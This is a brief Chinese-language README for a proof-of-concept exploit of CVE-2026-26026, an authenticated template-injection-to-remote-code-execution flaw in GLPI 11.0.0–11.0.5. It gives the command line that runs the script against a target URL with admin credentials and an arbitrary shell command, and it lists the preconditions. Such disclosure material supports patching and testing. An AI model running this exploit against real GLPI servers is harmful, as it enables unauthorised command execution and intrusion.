
CVE-2026-26026 GLPI 版本 11.0.0 至 11.0.5 的 PoC 脚本
针对 CVE-2026-26026(GLPI 11.0.0–11.0.5)的已认证 SSTI → RCE 漏洞利用。
完整分析文章:https://www.bzhunt.fr/blog/cve_glpi/
python3 POC_GLPI_Form_Dropdown_SSTI.py https://target.com \
-u glpi -p 'glpi' --cmd 'id'
需要拥有 form CREATE 权限的账户(超级管理员)。目标必须为 GLPI ≤ 11.0.5(已在 11.0.6 中修复)。
pip install requests